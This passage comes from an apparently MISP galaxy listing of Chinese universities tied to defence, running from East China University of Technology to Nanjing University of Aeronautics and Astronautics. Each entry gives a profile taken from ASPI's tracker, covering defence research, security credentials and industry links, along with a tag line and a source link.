Table 880. Table References

Links

https://unitracker.aspi.org.au/universities/donghua-university

East China University of Technology (东华理工大学)

ECUT was founded in 1956 as the first institution of higher education for China’s nuclear industry. Since 2001, it has been subject to four ‘joint construction’ agreements between the Jiangxi Provincial Government and defence industry agency SASTIND or its predecessor COSTIND. These agreements are designed to develop the university’s involvement in defence-related research and training. The Ministry of Natural Resources and defence conglomerate China National Nuclear Corporation are also involved in supervising and supporting ECUT. ECUT carries out defence research related to nuclear science and hosts a defence laboratory on radioactive geology. It holds secret-level security credentials, allowing it to participate in classified defence technology projects. In 2006, the East China University of Technology National Defence Technology Institute (东华理工大学国防科技学院) was established.

The tag is: misp-galaxy:china-defence-universities="East China University of Technology (东华理工大学)"

Table 881. Table References

Links

https://unitracker.aspi.org.au/universities/east-china-university-of-technology

Engineering University of the CAPF (中国人民武装警察部队工程大学)

The Engineering University of the CAPF is an institution devoted to training personnel in China’s paramilitary service, the People’s Armed Police, in command and engineering disciplines. The university focuses on paramilitary information engineering, paramilitary equipment technology, non-lethal weapons, military communications and mathematical cryptography. Students of the university can select majors from disciplines such as communications engineering, information security, military big data engineering, management science and engineering, and mechanical engineering. The Engineering University of the CAPF hosts the Key Military Laboratory for Non-Lethal Weapons (非致命武器等全军重点实验室), the Big Data and Cloud Computing Laboratory (大数据与云计算实验室), and the Command Automation Training Centre (指挥自动化培训中心), indicating expertise in these areas. The Engineering University of the CAPF has collaborated significantly with a Beijing-based company called SimpleEdu (北京西普阳光教育科技股份有限公司), focusing primarily on social media and internet research. Below is a list of initiatives with which the Engineering University of the CAPF has collaborated:

The tag is: misp-galaxy:china-defence-universities="Engineering University of the CAPF (中国人民武装警察部队工程大学)"

Table 882. Table References

Links

https://unitracker.aspi.org.au/universities/engineering-university-of-the-capf

Fudan University (复旦大学)

Fudan University is among China’s best universities. It was ranked 104th in the world by Times Higher Education in 2019. The university appears to engage in high levels of work for the military on materials science, including stealth technology. All defence-related projects and matters in Fudan are managed by the university’s Institute of Special Materials and Technology (专用材料与装备技术研究院) and Defence Industry Secrets Committee (复旦大学军工保密委员会). The Institute of Special Materials and Technology specialises in defence research and works on simulations, precision manufacturing, and materials. Professor Ye Mingxin, the institute’s director, is also an advisor to the PLA and defence companies on materials science. Fudan University’s Materials Science Department includes one professor who is described as specifically being a ‘defence system professor’, which may refer to Professor Ye. In 2011, Fudan established a State Secrets Academy (国家保密学院), in partnership with China’s National Administration of State Secrets Protection (国家保密局). The academy carries out research and training on the protection of state secrets.

The tag is: misp-galaxy:china-defence-universities="Fudan University (复旦大学)"

Table 883. Table References

Links

https://unitracker.aspi.org.au/universities/fudan-university

Fuzhou University (福州大学)

Fuzhou University is overseen by the Fujian Provincial Government and has a focus on engineering disciplines. It does not appear to engage in significant levels of defence research. However, the Fuzhou University Military-Civil Fusion Innovation Research Institute (福州大学军民融合创新研究院) was jointly established in 2016 by Fuzhou University along with a number of defence companies and military research institutions under the guidance of Fujian Provincial Government’s National Defence Industry Office (省国防科工办). Furthermore, the Fujian Provincial People’s Government and SASTIND entered an agreement to jointly develop the university as part of China’s military-civil fusion initiative in 2018. This indicates that the university will expand its involvement in defence research. The university has held second-class weapons R&D secrecy credentials since 2006.

The tag is: misp-galaxy:china-defence-universities="Fuzhou University (福州大学)"

Table 884. Table References

Links

https://unitracker.aspi.org.au/universities/fuzhou-university

Guilin University of Electronic Science and Technology (桂林电子科技大学)

GUET specialises in electronics, communications and computer science. It engages in growing levels of defence research, indicated by the decision to place it under the joint administration of the defence industry agency SASTIND and the Guangxi Provincial Government in 2018. The PLA describes GUET as ‘Guangxi Province’s only university to have long carried out defence research.’ Areas of defence research at the university include communications technology, materials science, signals processing, microwaves, satellite navigation, and command and control. Since 2007, the university has held secret-level security credentials, enabling it to participate in classified weapons and defence technology projects.

The tag is: misp-galaxy:china-defence-universities="Guilin University of Electronic Science and Technology (桂林电子科技大学)"

Table 885. Table References

Links

https://unitracker.aspi.org.au/universities/guilin-university-of-electronic-science-and-technology

Hangzhou Dianzi University (杭州电子科技大学)

HDU specialises in information technology and has been jointly supervised by the Zhejiang Provincial Government and defence industry agency SASTIND since 2007. The university is Zhejiang Province’s only provincial-level higher education institution to have officially designated national defence disciplines. HDU’s leadership is closely integrated with its defence research. Since its creation in 2008, the university’s main defence laboratory has been run by Xue Anke, who was the university’s president until 2017. While president, Xue served on an expert advisory committee to the PLA on information technology. He is also a member of the Zhejiang Provincial Expert Committee on Artificial Intelligence Development. Key areas of defence research at HDU include electronics, artificial intelligence, military-use software, and communications and information systems. HDU has been expanding its research on artificial intelligence, establishing a school of artificial intelligence and an artificial intelligence research institute in 2018. HDU holds secret-level security credentials, allowing it to undertake classified weapons and defence technology projects. In 2011, the Zhejiang State Secrets Bureau established a State Secrets Academy in HDU. The academy, one of twelve in the country, trains personnel in managing and protecting confidential information.

The tag is: misp-galaxy:china-defence-universities="Hangzhou Dianzi University (杭州电子科技大学)"

Table 886. Table References

Links

https://unitracker.aspi.org.au/universities/hangzhou-dianzi-university

Hangzhou Normal University (杭州师范大学)

Hangzhou Normal University is a Chinese university subordinate to the Zhejiang Provincial Government. The university was initially established in 1978 as Hangzhou Normal College (杭州师范学院) to focus on teacher training, art education as well as research in the humanities and natural sciences. Hangzhou Normal University retains this broad academic focus and oversees faculties such as the Alibaba Business School (阿里巴巴商学院). Hangzhou Normal University collaborates with China’s MPS on the development of surveillance technology. In March 2019, the university entered into an agreement with the Zhejiang Police College, the Zhejiang Public Security Office, and Hikvision, China’s leading producer of video surveillance technology, to establish a joint laboratory. The joint laboratory reportedly focuses on applying big data analysis, cloud computing and internet of things technology to improve China’s policing capability.

The tag is: misp-galaxy:china-defence-universities="Hangzhou Normal University (杭州师范大学)"

Table 887. Table References

Links

https://unitracker.aspi.org.au/universities/hangzhou-normal-university

Harbin Engineering University (哈尔滨工程大学)

HEU is one of China’s top defence research universities. The university is a leading centre of research and training on shipbuilding, naval armaments, maritime technology and nuclear power. 36.46% of the university’s 2017 graduates who found employment were working in the defence sector. As one of the group of universities subordinate to the Ministry of Industry and Information Technology (MIIT) known as the ‘Seven Sons of National Defence’ (国防七子), HEU is an integral part of China’s defence industry. HEU’s achievements include producing China’s first experimental submarine, ship-based computer, and hovercraft. The university claims to have participated in most of the PLA Navy’s submarine, undersea weapon, and warship projects. HEU’s role in the defence industry is highlighted by its formal affiliation with the PLA Navy, which became a supervising agency of the university in 2007. Under the supervisory agreement, the PLA Navy committed to developing HEU’s capacity as a platform for research and development in military technology and for training defence personnel. The following year, HEU established a Defence Education Institute to train reserve officers. Since then, the institute has trained at least 1,700 officers. HEU also maintains a joint laboratory with the PLA Navy Coatings Analysis and Detection Center. HEU is an important hub of research on nuclear engineering, including on nuclear submarines. In 2018, it signed a co-construction agreement with defence conglomerate China National Nuclear Corporation (CNNC). In 2019, HEU and CNNC established the China Nuclear Industry Safety and Simulation Technology Research Institute. HEU also runs a joint laboratory on energetic materials (such as explosives) with the Chinese Academy of Engineering Physics, China’s nuclear warhead research organisation.

The tag is: misp-galaxy:china-defence-universities="Harbin Engineering University (哈尔滨工程大学)"

Table 888. Table References

Links

https://unitracker.aspi.org.au/universities/harbin-engineering-university

Harbin Institute of Technology (哈尔滨工业大学)

HIT is one of China’s top defence research universities. As one of seven universities run by MIIT, it is known as one of the ‘Seven Sons of National Defence’ (国防七子). The Seven Sons of National Defence all have close relationships with the Chinese military and are core training and research facilities for China’s defence industry. In 2018, HIT spent RMB1.97 billion (AUD400 million), more than half of its research budget, on defence research. 29.96% of the university’s graduates that year who found employment were working in the defence sector. HIT has been described by Chinese state media as having ‘defence technology innovation and weapons and armaments modernisation as its core’. It excels in satellite technology, robotics, advanced materials and manufacturing technology, and information technology. Other areas of defence research at HIT include nuclear technology, nuclear combustion, nuclear power engineering and electronic propulsion and thruster technology, many of which are officially designated as skill shortage areas for the Chinese defence industry. HIT is best known for its aerospace research and has a close relationship with China Aerospace Science and Technology Corporation (CASC), a state-owned defence company that specialises in long-range ballistic missile and satellite technology. Since 2008, HIT and CASC have operated a joint research centre. Defence conglomerates CASC, CASIC, AVIC and CETC rank among the top employers of HIT graduates. The university is a major source of cyber talent and receives funding for information security research from the MSS, China’s civilian intelligence agency. A report prepared for the US–China Security and Economic Review Commission identified it as one of four universities focused on research with applications in information warfare. In 2003, HIT founded its Information Countermeasures Technology Research Institute (哈尔滨工业大学信息对抗技术研究所).

The tag is: misp-galaxy:china-defence-universities="Harbin Institute of Technology (哈尔滨工业大学)"

Table 889. Table References

Links

https://unitracker.aspi.org.au/universities/harbin-institute-of-technology

Harbin University of Science and Technology (哈尔滨理工大学)

HRBUST focuses on engineering, science, economics, management, philosophy, literature, law and education. In 2015, it was placed under the joint supervision of the Heilongjiang Provincial Government and SASTIND, which is an arrangement designed to develop the university’s involvement in defence-related research and training. HRBUST’s relationship with SASTIND indicates that it will continue expanding its role in defence research. Currently, the university has at least four designated national defense disciplines and plans to build a national defense key laboratory. It holds secret-level security credentials.

The tag is: misp-galaxy:china-defence-universities="Harbin University of Science and Technology (哈尔滨理工大学)"

Table 890. Table References

Links

https://unitracker.aspi.org.au/universities/harbin-university-of-science-and-technology

Hebei University (河北大学)

Hebei University is Hebei Province’s only comprehensive university. The university is subordinate to the Ministry of Education and also supervised by the Hebei Provincial Government and defence industry agency SASTIND. Its supervision by SASTIND, which began in 2013, is designed to support the university in ‘strengthening its national defence characteristics’. HBU appears to be relatively secretive about its defence research. In 2017, SASTIND designated an area of research at the university’s College of Physics Science and Technology as a ‘discipline with defence characteristics’. An article about this on the university’s news site has been taken down and deliberately did not specify the discipline. However, a speech given by the head of the college named military-use power and energy as HBU’s only defence discipline. The university holds secret-level security credentials, allowing it to participate in classified defence technology projects. In 2017, HBU held a forum on military-civil fusion for technology and innovation to ‘uncover the university’s potential for defence-industry technological research’ and encourage greater integration with defence companies.

The tag is: misp-galaxy:china-defence-universities="Hebei University (河北大学)"

Table 891. Table References

Links

https://unitracker.aspi.org.au/universities/hebei-university

Hebei University of Science and Technology (河北科技大学)

HEBUST engages in moderate but growing levels of defence research. It has been supervised by defence industry agency SASTIND since 2013, when SASTIND and the Hebei Provincial Government agreed to jointly develop the university’s involvement in defence research. By 2017, the university claimed to have completed 300 defence projects. The university holds secret-level security credentials, allowing it to participate in classified defence technology projects. While the university does not appear to have any dedicated defence laboratories, it has described five of its laboratories as platforms for defence research. Areas of materials science, mechanical engineering and control science at HEBUST have been designated ‘disciplines with national defence characteristics’ by SASTIND. HEBUST may also be pursuing greater integration between China’s defence needs and the university’s research on textiles engineering and biological fermentation. HEBUST states that it has developed close cooperation with China Electronics Technology Group Corporation’s 54th Research Institute, an organization blacklisted on the US Government’s Entity List. Defence industry conglomerate Aviation Industry Corporation of China also funds research at the university.

The tag is: misp-galaxy:china-defence-universities="Hebei University of Science and Technology (河北科技大学)"

Table 892. Table References

Links

https://unitracker.aspi.org.au/universities/hebei-university-of-science-and-technology

Hefei University of Technology (合肥工业大学)

HFUT is a leading Chinese university subordinate to the Ministry of Education. It specialises in engineering and engages in growing levels of defence research, particularly in the fields of advanced materials, smart manufacturing and electronic information. As of 2018, HFUT was the only civilian university in Anhui Province fully certified to carry out military projects, holding secret-level security credentials, and had undertaken over 200 such projects. In 2018, the university came under a ‘joint-construction’ agreement between the Ministry of Education and defence industry agency SASTIND. According to HFUT, this agreement ‘will powerfully advance the university’s development of national defence disciplines, training of talent for defence industry, and construction of defence industry and national defence research platforms.’ Miao Wei, head of the Ministry of Industry and Information Technology, which oversees China’s defence industry, is a graduate of HFUT.

The tag is: misp-galaxy:china-defence-universities="Hefei University of Technology (合肥工业大学)"

Table 893. Table References

Links

https://unitracker.aspi.org.au/universities/hefei-university-of-technology

Heilongjiang Institute of Technology (黑龙江工程学院)

HLJIT is an engineering-focused university that engages in growing levels of defence research. In 2015, the Heilongjiang Provincial Government partnered with defence industry agency SASTIND to expand the university’s ability to ‘show its national defence characteristics and serve the national defence science and technology industry.’ SASTIND has designated military-use power and energy, optoelectronics and laser technology, and computing as three ‘disciplines with national defence characteristics’ at HLJIT. In June 2016, HLJIT and ZTE jointly launched an MOE-ZTE ICT Product-Teaching Integration Innovation Base (教育部-中兴通讯ICT产教融合创新基地) and established the Heilongjiang School of Engineering-ZTE Information and Communications Technology College (黑龙江工程学院-中兴信息通信技术学院). ZTE has been reportedly barred from US government contracts. As it increases its implementation of military-civil fusion, HLJIT has developed relationships with defence conglomerates. The university is particularly close to China Aerospace Science and Technology Corporation (CASC), a leading state-owned manufacturer of long-range missiles and satellites. In 2017, HLJIT partnered with a subsidiary of CASC to establish a joint research centre, the Aerospace Smart City Research Institute. The subsidiary, Aerospace Shenzhou Smart System Technology Co., Ltd. (航天神舟智慧系统技术有限公司), specialises in smart city and informatization technology. HLJIT holds confidential-level security credentials, allowing it to participate in confidential defence technology projects.

The tag is: misp-galaxy:china-defence-universities="Heilongjiang Institute of Technology (黑龙江工程学院)"

Table 894. Table References

Links

https://unitracker.aspi.org.au/universities/heilongjiang-institute-of-technology

Heilongjiang University (黑龙江大学)

HLJU is supervised by the Ministry of Education, the Heilongjiang Provincial Government and SASTIND. SASTIND’s supervision of the university is designed to promote its integration with China’s defence technology goals. In 2016, the year after HLJU came under SASTIND’s supervision, the university received third-class security credentials and funding for a national defence technology research project for the first time. Third-class security credentials allow the university to participate in confidential defence research projects. By 2018, HLJU claimed to have received RMB13 million (AUD2.7 million) in defence research funding. HLJU has close ties with Russian universities and is best known for its work in the Chemistry, Chemical Engineering and Materials Department, which entered the top 1 percent of ESI’s global rankings.

The tag is: misp-galaxy:china-defence-universities="Heilongjiang University (黑龙江大学)"

Table 895. Table References

Links

https://unitracker.aspi.org.au/universities/heilongjiang-university

Henan University of Science and Technology (河南科技大学)

HAUST is Henan province’s leading civilian university for defence research. In 2008, it became the first university in the province to receive security credentials allowing it to participate in classified weapons projects. In 2016, it became the province’s only university subject to a ‘joint-construction’ agreement with defence industry agency SASTIND, an arrangement designed to increase HAUST’s involvement in defence research. As early as 2009, the university stated that it had made great contributions to the defence and aviation industries, undertaking large amounts of defence research projects. HAUST describes itself as China’s primary university for research and training for the mechanical bearings (such as ball bearings) industry. SASTIND has designated three areas of research at the university as ‘disciplines with defence characteristics’, covering systems engineering, materials science and mechanics. The university is actively involved in military-civil fusion activities. The university claims to have made important contributions to the development of bearings for aircraft engines, satellites, and spacecraft. It states that it has resolved critical technological problems for specific weapons guidance systems, ballistic missile testing systems and an infrared targeting and interference emulation system that are probably used to test guided missiles.

The tag is: misp-galaxy:china-defence-universities="Henan University of Science and Technology (河南科技大学)"

Table 896. Table References

Links

https://unitracker.aspi.org.au/universities/henan-university-of-science-and-technology

Huazhong University of Science and Technology (华中科技大学)

HUST is one of China’s leading research institutions. While the university is subordinate to the Ministry of Education, it has also been supervised by the State Administration of Science, Technology and Industry for National Defense since 2012. The university hosts at least six laboratories dedicated to defence research. Its National Defence Research Institute reportedly oversees defence research in seven other HUST research centres. Artificial intelligence, shipbuilding, image processing, navigation technology, mechanical engineering, electronics, materials science and laser physics are focuses of HUST’s defence research. HUST has worked closely with the PLA and China’s defence industry. This collaboration includes the development of artificial intelligence and imaging technology for weapons. The university’s work on pulsed power is linked to China’s nuclear and directed-energy weapons program. China’s state-owned defence conglomerates and China’s nuclear warhead facility sponsor dozens of HUST postgraduate students each year, who are required to work at their sponsoring organisation for at least five years after graduating. HUST holds secret-level security credentials, allowing it to participate in research and production for classified weapons and defence projects.

The tag is: misp-galaxy:china-defence-universities="Huazhong University of Science and Technology (华中科技大学)"

Table 897. Table References

Links

https://unitracker.aspi.org.au/universities/huazhong-university-of-science-and-technology

Hunan University (湖南大学)

HNU is a leading Chinese university subordinate to the Ministry of Education. In recent years, its participation in defence research appears to have grown substantially. In 2010, it established the National Supercomputer Center in Changsha jointly with the PLA National University of Defense Technology, which has since been placed on the US Government Entity List for its suspected role in nuclear weapons research. In 2011, China’s defence industry agency, SASTIND, entered a partnership with the MOE to expand the university’s participation in defence research and defence industry ties. This arrangement was renewed in 2016. In 2013, SASTIND and the Hunan Provincial Government also signed an agreement to jointly support the development of the university’s National Supercomputer Center. HNU holds secret-level security credentials, enabling it to participate in research and production for weapons and other defence projects.

The tag is: misp-galaxy:china-defence-universities="Hunan University (湖南大学)"

Table 898. Table References

Links

https://unitracker.aspi.org.au/universities/hunan-university

Hunan University of Science and Technology (湖南科技大学)

HNUST is an engineering-focused university founded in 2003. In 2016, it was subject to a ‘joint-construction’ agreement between the Hunan Provincial Government and defence industry agency SASTIND, an arrangement designed to develop the university’s involvement in defense-related research and training. The university has three designated defence research areas, is involved in weapons research, and has confidential-level security credentials. HNUST is home to two national defence key laboratories, one of which is in the School of Materials Science and Engineering. The university has also established its Intelligent Manufacturing Institute, which evolved from a provincial key laboratory and has connections to the Made in China 2025 strategy. HNUST is also linked to state-owned arms manufacturer Norinco Group. In 2018, it signed a strategic cooperation agreement with arms manufacturer Norinco’s National Defence Key Laboratory on Light Weapons Terminal Lethality Technology (轻武器终点杀伤技术国防科技重点实验 aka 瞬态冲击技术国防科技重点实验室).

The tag is: misp-galaxy:china-defence-universities="Hunan University of Science and Technology (湖南科技大学)"

Table 899. Table References

Links

https://unitracker.aspi.org.au/universities/hunan-university-of-science-and-technology

Information Engineering University (中国人民解放军信息工程大学)

IEU was formed in June 2017, combining the old Information Engineering University with the PLA Foreign Languages University. PLA experts have described IEU as ‘the sole military academy for the cyber and electronic warfare arms of China’s network-electronic forces’. The IEU is currently subordinate to the PLA Strategic Support Force’s Network Systems Department, which holds the military’s signals intelligence capabilities. Previously, the university was run by the General Staff Department Third Department (commonly known as 3PLA), the PLA’s signals intelligence service that has been incorporated into the Strategic Support Force. IEU’s command tracks include Network Engineering (网络工程), which is dedicated to the cultivation of cyber attack and defense technical cadre (网络攻防技术干部). It is responsible for the construction of the Henan Provincial Laboratory of Visible Light Communication (河南省可见光通信重点实验室). The university is primarily known for research and training on hacking, cryptography, signals processing, surveying and mapping, and navigation technology. However, since absorbing the PLA Foreign Languages University, it now serves as one of the most important language schools for Chinese military intelligence officers, describing itself as a ‘whole-military foreign languages training base for individuals going abroad’. While the PLA Foreign Languages University is best known for training signals intelligence officers, it has also trained many officers in the PLA’s political warfare wing, the Central Military Commission Political Work Department Liaison Bureau.

The tag is: misp-galaxy:china-defence-universities="Information Engineering University (中国人民解放军信息工程大学)"

Table 900. Table References

Links

https://unitracker.aspi.org.au/universities/information-engineering-university-2

Institute of NBC Defense (陆军防化学院)

The Institute of NBC Defense is the PLA’s premier institution devoted to training junior, mid-career and senior officers on technology related to defence against nuclear, biological and chemical weapons. Most scientific research tends to focus on radiation protection and nuclear safety.

The tag is: misp-galaxy:china-defence-universities="Institute of NBC Defense (陆军防化学院)"

Table 901. Table References

Links

https://unitracker.aspi.org.au/universities/institute-of-nbc-defense

Jiangnan Social University (江南社会学院)

JSU trains intelligence officers in tradecraft and carries out research on intelligence and security. The university first opened in 1986 with over 600 students and staff. Since 1999, it has run the Journal of Jiangnan Social University, which publishes research on international security, strategy and politics. Satellite and streetview imagery from Google Maps and Baidu appears to show a shooting range at the southern end of its campus.

The tag is: misp-galaxy:china-defence-universities="Jiangnan Social University (江南社会学院)"

Table 902. Table References

Links

https://unitracker.aspi.org.au/universities/jiangnan-social-university

Jiangsu University of Science and Technology (江苏科技大学)

JUST engages in high levels of defence research. With a focus on research relevant to the PLA Navy, JUST is supervised by the China State Shipbuilding Corporation and the China Shipbuilding Industry Corporation, China’s leading defence shipbuilding conglomerates. In 2002, JUST was one of eight universities jointly supervised by defence industry agency COSTIND and a provincial government. In 2016, it was the subject of an agreement between the Jiangsu Provincial Government and defence industry agency SASTIND to expand its role in defence research. JUST scientists have been involved in nuclear submarine, unmanned submersible and aircraft carrier projects. The university holds secret-level security credentials, allowing it to participate in classified defence technology projects. Faculties at the university involved in defence research include the School of Naval Architecture and Ocean Engineering and the School of Energy and Propulsion.

The tag is: misp-galaxy:china-defence-universities="Jiangsu University of Science and Technology (江苏科技大学)"

Table 903. Table References

Links

https://unitracker.aspi.org.au/universities/jiangsu

Jilin University (吉林大学)

JLU is directly under the administration of the Ministry of Education and came under the joint supervision of the ministry and defence industry agency SASTIND in 2016. In 2017, SASTIND designated eight fields of research at JLU as national defence disciplines, indicating the university carries out high levels of defence research. In 2012, JLU spent roughly RMB60 million (AUD12.5 million) on defence research, a number that is likely to have grown substantially. JLU’s National Defense Science and Technology Research Institute, also known as the Advanced Technology Research Institute, was established in April 2006 and is responsible for the organization and management of the university’s national defence science and technology projects. The research institute has received several certifications to conduct research for military applications. It conducts research in collaboration with the former PLA General Armaments Department, SASTIND, and state-owned defence conglomerates in the fields of aviation, aerospace, electronics, nuclear technology, and shipbuilding. JLU’s State Key Laboratory of Superhard Materials (超硬材料国家重点实验室) works closely with China’s nuclear weapons complex, the Chinese Academy of Engineering Physics (CAEP). Job advertisements for a CAEP subsidiary, the Center for High Pressure Science & Technology Advanced Research (北京高压科学研究中心) state that it has a branch within Jilin University. This suggests that CAEP may even be involved in managing the State Key Laboratory of Superhard Materials. The university hosts at least two defence research labs, located in the university’s College of Computer Science and Technology and in the College of Chemistry. Its Key Laboratory of Attack and Defense Simulation Technology for Naval Warfare, Ministry of Education (海战场攻防对抗仿真技术教育部重点实验室(B类)) is involved in cybersecurity research for the Navy. The lab’s academic committee is headed by a computer scientist from China Aerospace Science and Technology Corporation, a leading state-owned missile manufacturer. JLU holds secret-level security credentials, allowing it to participate in research and production for classified weapons and defence technology projects.

The tag is: misp-galaxy:china-defence-universities="Jilin University (吉林大学)"

Table 904. Table References

Links

https://unitracker.aspi.org.au/universities/jilin-university

Kunming University of Science and Technology (昆明理工大学)

Kunming University of Science and Technology appears to engage in low levels of defence research, but its involvement in defence research is likely to grow. In 2017, Kunming University of Science and Technology signed an agreement with Yunnan’s defence technology bureau to deepen military-civil fusion. In 2018, the Yunnan Provincial Government and defence industry agency SASTIND signed an agreement to jointly construct KMUST. The agreement is designed to increase the university’s involvement in defence research. KMUST carries out high levels of research on metallurgy. It is involved in defence research related to China’s aviation industry, and collaborates with defence shipbuilding conglomerate CSIC on vibration and noise research.

The tag is: misp-galaxy:china-defence-universities="Kunming University of Science and Technology (昆明理工大学)"

Table 905. Table References

Links

https://unitracker.aspi.org.au/universities/kunming-university-of-science-and-technology

Lanzhou University (兰州大学)

LZU’s involvement in defence research has slowly grown over the past decade. In 2018, it spent over RMB50 million (AUD10 million) on defence projects. LZU is subordinate to the Ministry of Education. Since 2018, it has also been supervised by defence industry agency SASTIND in an arrangement designed to further expand the university’s defence research and its defence industry relationships. LZU carries out national defence-related research in areas such as nuclear science, electromagnetism, probes, chemistry, mechanics, materials science, stealth technology and information technology. In 2017 and 2018, LZU signed strategic agreements with state-owned defence companies Norinco Group, China’s largest arms manufacturer, and China National Nuclear Corporation. Several defence companies, as well as China’s nuclear weapons program, provide scholarships for dozens of LZU postgraduate students each year. In return, these students must work for their sponsoring organisation for five years after graduation. In 2005, LZU received secret-level security credentials that allow it to participate in classified weapons projects.

The tag is: misp-galaxy:china-defence-universities="Lanzhou University (兰州大学)"

Table 906. Table References

Links

https://unitracker.aspi.org.au/universities/lanzhou-university

Lanzhou University of Technology (兰州理工大学)

The tag is: misp-galaxy:china-defence-universities="Lanzhou University of Technology (兰州理工大学)"

Table 907. Table References

Links

https://unitracker.aspi.org.au/universities/lanzhou-university-of-technology

Logistics University of the People’s Armed Police Force (中国人民武装警察部队后勤学院)

The Logistics University of the People’s Armed Police Force is an institution devoted to training personnel in logistics for China’s paramilitary service, the People’s Armed Police. The university teaches subjects in applied economics, military logistics studies, paramilitary logistics, applied psychology, as well as communications and transportation engineering. The Logistics University of the People’s Armed Police Force actively collaborates with private institutions and civilian universities on scientific research. For example, the university collaborated with Nankai University (南开大学) and the Tianjin Eminent Electric Cell Material Company (天津爱敏特电池材料有限公司) on high performance lithium and sodium ion materials in 2018. The university also collaborated with the Tianjin Polytechnic University (天津工业大学) on intelligent, wearable technology that monitors heart rates for both military and civilian personnel.

The tag is: misp-galaxy:china-defence-universities="Logistics University of the People’s Armed Police Force (中国人民武装警察部队后勤学院)"

Table 908. Table References

Links

https://unitracker.aspi.org.au/universities/logistics-university-of-the-peoples-armed-police-force

Nanchang Hangkong University (南昌航空大学)

NCHU engages in high levels of defence research relevant to the aviation industry. In 2017, the Ministry of Education designated it a ‘school with national defence education characteristics’, and 30% of graduates go to work in the defence industry or civilian aviation companies. The university has been supervised by defence industry agency SASTIND since 2010. It holds secret-level security credentials. Five fields of research at NCHU are designated ‘national defence key disciplines’: precision forming and joining technology, component quality testing and control, testing and measurement technology and instruments, optoelectric and laser technology, and military-use critical materials. The university hosts at least three laboratories focused on defence research. NCHU is particularly close to AVIC, the Chinese military’s aircraft manufacturing company. In particular, AVIC subsidiary Hongdu Aviation Industry Group (洪都航空工业集团) is based in Nanchang and has frequent exchanges with NCHU.

The tag is: misp-galaxy:china-defence-universities="Nanchang Hangkong University (南昌航空大学)"

Table 909. Table References

Links

https://unitracker.aspi.org.au/universities/nanchang-hangkong-university

Nanchang University (南昌大学)

NCU engages in low levels of defence research. It holds secret-level security credentials, allowing it to carry out classified defence research. In 2006, it established a defence research institute together with five provincial defence industry companies. Based on affiliated staff members, the institute may be focused on mechanical engineering. The university was added to the US Government Unverified List in 2018. Entities are added to the Unverified List if the US Government is unable to satisfactorily carry out end-user checks on them to ensure compliance with export licenses.

The tag is: misp-galaxy:china-defence-universities="Nanchang University (南昌大学)"

Table 910. Table References

Links

https://unitracker.aspi.org.au/universities/nanchang-university

Nanjing Army Command College (南京陆军指挥学院)

The Nanjing Army Command College is an institute devoted to training mid-career staff officers in preparation for command of the PLA Ground Force. Disciplines of focus for the college include joint campaign tactics, warfighting command, military training and combat simulations.

The tag is: misp-galaxy:china-defence-universities="Nanjing Army Command College (南京陆军指挥学院)"

Table 911. Table References

Links

https://unitracker.aspi.org.au/universities/nanjing-army-command-college

Nanjing Institute of Information Technology (南京信息技术研究院)

Nanjing Institute of Information Technology (南京信息技术研究院)

The tag is: misp-galaxy:china-defence-universities="Nanjing Institute of Information Technology (南京信息技术研究院)"

Table 912. Table References

Links

https://unitracker.aspi.org.au/universities/nanjing-institute-of-information-technology

Nanjing Normal University (南京师范大学)

Nanjing Normal University is a leading Chinese university supervised by the Ministry of Education and Jiangsu Provincial Government. The university has strengths in geospatial technology, big data and artificial intelligence. Nanjing Normal University has close ties to the Ministry of Public Security. In 2014, the university established the Ministry of Public Security Key Laboratory for Police Geospatial Information Technology (警用地理信息技术公安部重点实验室), which researches applications of geospatial information technology for policing purposes. Nanjing Normal University has also entered into an agreement with the Nanjing Municipal Public Security Bureau, establishing the ‘Video GIS Technology Laboratory’ (视频GIS技术实验室) in April 2012. Nanjing Normal University has a close relationship with the regional government in Xinjiang, where over 1 million Uyghurs and Kazakhs are currently held in internment camps. In 2015, the university entered into an agreement with the Xinjiang Uyghur Autonomous Government and the Jiangsu Municipal Government to support the development of Yili Normal University.

The tag is: misp-galaxy:china-defence-universities="Nanjing Normal University (南京师范大学)"

Table 913. Table References

Links

https://unitracker.aspi.org.au/universities/nanjing-normal-university

Nanjing Tech University (南京工业大学)

In 2016, NJTech came under the joint supervision of the Jiangsu Provincial Government and defence industry agency SASTIND, which is an arrangement designed to develop the university’s involvement in defense-related research and training. The university has four designated defence research areas and secret-level security credentials, allowing it to undertake classified defence technology projects. NJTech is expanding its defence research on materials science, chemistry, optical engineering and systems engineering. In 2018, the university established a Military-Civil Fusion Development Research Institute to deepen its implementation of military-civil fusion. NJTech has a Defence Industry Science Office (军工科研办公室) within its Department of Scientific Research. This office is responsible for the university’s defence-related research and coordination. NJTech’s School of Materials Science and Engineering (材料科学与工程学院) has previously worked on defence-related projects. The university has international ties with universities in England that focus on electronics and semiconductors. It has also established a joint research center with Russian universities for advanced technology R&D.

The tag is: misp-galaxy:china-defence-universities="Nanjing Tech University (南京工业大学)"

Table 914. Table References

Links

https://unitracker.aspi.org.au/universities/nanjing-tech-university

Nanjing University (南京大学)

NJU is subordinate to the MOE and has also been supervised by defence industry agency SASTIND since 2012. In 2016, the university was selected as a participant in the first batch of national dual-use demonstration bases, and a year later in 2017 was selected as a Class A world-class university. NJU is home to at least two defence laboratories and has committed to deepening its involvement in military-civilian fusion. As the first university in China to establish a State Secrecy Academy, in 2009, Nanjing University is involved in cyber security research. In 2018, NJU established an Institute of Artificial Intelligence and reported its research progress to the Jiangsu Provincial Committee of Military-Civilian Fusion when they visited the university. Following the visit, the provincial committee expressed interest in deepening cooperation on MCF projects in order to promote Jiangsu’s MCF work. The Institute of AI also co-built a research center with Intel, the Intel-Nanjing University Artificial Intelligence Research Center, which is Intel’s first research center focusing on AI in China. The university’s rapidly developing AI Institute provides an opportunity for deepening its involvement in MCF R&D. In May 2018, NJU signed a strategic cooperation agreement with Megvii (旷视科技). Megvii has been blacklisted by the US government over human rights abuses.

The tag is: misp-galaxy:china-defence-universities="Nanjing University (南京大学)"

Table 915. Table References

Links

https://unitracker.aspi.org.au/universities/nanjing-university

Nanjing University of Aeronautics and Astronautics (南京航空航天大学)

NUAA is one of the ‘Seven Sons of National Defence’ subordinate to the Ministry of Industry and Information Technology. NUAA specialises in aerospace research and works closely with the Chinese military as well as civilian and military aviation companies, including military aircraft manufacturers AVIC and AECC. 21% of the university’s graduates in 2018 who found employment were working in the defence sector. The university claims to have participated in nearly all major national aviation projects, including the development of the Chang’e 3 unmanned lunar explorer. NUAA hosts China’s only national defence laboratory for helicopter technology. NUAA has attracted controversy for its alleged involvement in the Ministry of State Security’s efforts to steal US aviation technology.

